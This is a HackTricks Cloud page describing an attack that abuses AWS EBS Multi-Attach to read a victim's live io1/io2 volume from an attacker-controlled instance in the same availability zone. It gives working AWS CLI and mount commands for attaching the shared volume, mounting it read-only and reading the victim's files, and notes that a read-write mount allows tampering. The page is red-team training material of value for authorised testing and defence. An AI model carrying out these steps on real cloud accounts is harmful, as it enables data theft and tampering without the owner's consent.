HackTricks CloudAWS - Live Data Theft via EBS Multi-Attach
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse EBS Multi-Attach to read from a live io1/io2 data volume by attaching the same volume to an attacker-controlled instance in the same Availability Zone (AZ). Mounting the shared volume read-only gives immediate access to in-use files without creating snapshots.
Requirements
- Target volume: io1 or io2 created with
--multi-attach-enabledin the same AZ as the attacker instance. - Permissions:
ec2:AttachVolume,ec2:DescribeVolumes,ec2:DescribeInstanceson the target volume/instances. - Infrastructure: Nitro-based instance types that support Multi-Attach (C5/M5/R5 families, etc.).
Notes
- Mount read-only with
-o ro,noloadto reduce corruption risk and avoid journal replays. - On Nitro instances the EBS NVMe device exposes a stable
/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_vol...path (helper below).
Prepare a Multi-Attach io2 volume and attach to victim
Example (create in us-east-1a and attach to the victim):
AZ=us-east-1a
# Create io2 volume with Multi-Attach enabled
VOL_ID=$(aws ec2 create-volume \
--size 10 \
--volume-type io2 \
--iops 1000 \
--availability-zone $AZ \
--multi-attach-enabled \
--tag-specifications 'ResourceType=volume,Tags=[{Key=Name,Value=multi-shared}]' \
--query 'VolumeId' --output text)
# Attach to victim instance
aws ec2 attach-volume --volume-id $VOL_ID --instance-id $VICTIM_INSTANCE --device /dev/sdf
On the victim, format/mount the new volume and write sensitive data (illustrative):
VOLNOHYP="vol${VOL_ID#vol-}"
DEV="/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_${VOLNOHYP}"
sudo mkfs.ext4 -F "$DEV"
sudo mkdir -p /mnt/shared
sudo mount "$DEV" /mnt/shared
echo 'secret-token-ABC123' | sudo tee /mnt/shared/secret.txt
sudo sync
Attach the same volume to the attacker instance
aws ec2 attach-volume --volume-id $VOL_ID --instance-id $ATTACKER_INSTANCE --device /dev/sdf
Mount read-only on the attacker and read data
VOLNOHYP="vol${VOL_ID#vol-}"
DEV="/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_${VOLNOHYP}"
sudo mkdir -p /mnt/steal
sudo mount -o ro,noload "$DEV" /mnt/steal
sudo cat /mnt/steal/secret.txt
Expected result: The same VOL_ID shows multiple Attachments (victim and attacker) and the attacker can read files written by the victim without creating any snapshot.
aws ec2 describe-volumes --volume-ids $VOL_ID \
--query 'Volumes[0].Attachments[*].{InstanceId:InstanceId,State:State,Device:Device}'
Helper: find the NVMe device path by Volume ID
On Nitro instances, use the stable by-id path that embeds the volume id (drop the dash after vol):
VOLNOHYP="vol${VOL_ID#vol-}"
ls -l /dev/disk/by-id/ | grep "$VOLNOHYP"
# -> nvme-Amazon_Elastic_Block_Store_volXXXXXXXX...
Impact
- Immediate read access to live data on the target EBS volume without generating snapshots.
- If mounted read-write the attacker can tamper with the victim filesystem (risk of corruption).
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.